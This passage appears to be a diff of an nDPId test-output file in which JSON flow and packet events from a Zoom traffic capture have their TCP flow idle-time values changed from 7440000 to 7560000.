00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569520470666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520470666,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABI4PAAAEARFPDAqAF1wKgB\/+EV4RUANLyaU3BvdFVkcDAJFTOWktM6lAABAARIlcIDDi3QR5gZLZgtSkZtNr91y8rdz4k="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
@@ -109,51 +109,51 @@ 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABALr4AAP8RCSjAqAF1wKgBAeLPADUALAFaRhQBAAABAAAAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQAB"} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx7AqAF11ROQadZTAbug3l1NAAAAALAC\/\/8zBgAAAgQFtAEDAwUBAQgKJZzghQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470755,"flow_last_seen":1569520470755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470755,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569520470755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx\/AqAF11ROQaNZUAbsLvInbAAAAALAC\/\/+bjgAAAgQFtAEDAwUBAQgKJZzgkQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx7AqAF11ROQadZTAbug3l1NAAAAALAC\/\/8zBgAAAgQFtAEDAwUBAQgKJZzghQAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470755,"flow_last_seen":1569520470755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470755,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569520470755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx\/AqAF11ROQaNZUAbsLvInbAAAAALAC\/\/+bjgAAAgQFtAEDAwUBAQgKJZzgkQAAAAAEAgAA"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569520470768,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470768,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQFgoAADcR6czAqAEBwKgBdQA19GMAPOFdr1GBgAABAAEAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVQ=="} 
00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470769,"flow_last_seen":1569520470769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470769,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569520470769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470769,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlHAqAF11fSMVdZVAbvq+zZHAAAAALAC\/\/8TBgAAAgQFtAEDAwUBAQgKJZzgnwAAAAAEAgAA"} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470775,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyLVE5BpwKgBdQG71lPrn+6AoN5dTqASqbAo0wAAAgQFrAQCCAp4fR7ZJZzghQEDAww="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470775,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyrAqAF11ROQadZTAbug3l1O65\/ugYAQECzxAQAAAQEICiWc4KR4fR7Z"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470769,"flow_last_seen":1569520470769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470769,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569520470769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470769,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlHAqAF11fSMVdZVAbvq+zZHAAAAALAC\/\/8TBgAAAgQFtAEDAwUBAQgKJZzgnwAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569520470775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470775,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyLVE5BpwKgBdQG71lPrn+6AoN5dTqASqbAo0wAAAgQFrAQCCAp4fR7ZJZzghQEDAww="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569520470775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470775,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyrAqAF11ROQadZTAbug3l1O65\/ugYAQECzxAQAAAQEICiWc4KR4fR7Z"} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569520470776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470776,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQ61QAADcRFILAqAEBwKgBdQA14s8APF0wRhSBgAABAAEAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVA=="} 
00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470776,"flow_last_seen":1569520470776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569520470776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470776,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlLAqAF11fSMVNZWAbv57BLmAAAAALAC\/\/8ncAAAAgQFtAEDAwUBAQgKJZzgpQAAAAAEAgAA"} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470787,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyPVE5BowKgBdQG71lTDwlhoC7yJ3KASqbBbBgAAAgQFrAQCCAp7WhBHJZzgkQEDAww="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470787,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyvAqAF11ROQaNZUAbsLvIncw8JYaYAQECwjNgAAAQEICiWc4K97WhBH"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470790,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1XV9IxVwKgBdQG71lXIKlM86vs2SKASqbDi9AAAAgQFrAQCCAp4gwNrJZzgnwEDAww="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470790,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl3AqAF11fSMVdZVAbvq+zZIyCpTPYAQECyrLwAAAQEICiWc4LJ4gwNr"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470801,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1bV9IxUwKgBdQG71lYtiv8U+ewS56ASqbDdrgAAAgQFrAQCCAp8tQexJZzgpQEDAww="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470801,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl7AqAF11fSMVNZWAbv57BLnLYr\/FYAQECyl5QAAAQEICiWc4Lx8tQex"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 